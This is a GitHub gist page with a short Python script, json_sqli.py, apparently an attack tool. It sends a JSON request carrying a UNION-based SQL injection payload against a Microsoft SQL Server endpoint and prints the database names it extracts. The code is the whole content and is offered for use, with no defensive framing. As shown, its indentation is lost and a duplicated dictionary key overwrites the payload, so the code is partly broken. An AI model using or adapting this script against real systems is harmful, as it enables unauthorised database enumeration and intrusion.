Skip to content

Instantly share code, notes, and snippets.

@scovell scovell/json_sqli.py
Created Nov 27, 2012

Embed
What would you like to do?
json_sqli.py
#!/usr/bin/python
import json
import requests
#function for executing the sql queries
def sqli(payload):
data=json.dumps(payload)
#make the content type of the request JSON
headers={'Content-type': 'application/json', 'Accept': 'text/plain'}
url="SQLI URL"
req=requests.post(url,data=data,headers=headers)
response=json.loads(req.text)
for r in response:
#check for the database output. 31337 is the identifier mark used in the payload
if r['value']=="31337":
print r['name']
def main():
list_of_db={"PARAMETER":"PARAMETER:'4' UNION SELECT 31337,name COLLATE Arabic_CI_AS FROM master..sysdatabases--","PARAMETER":"PARAMETER"}
sqli(list_of_db)
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.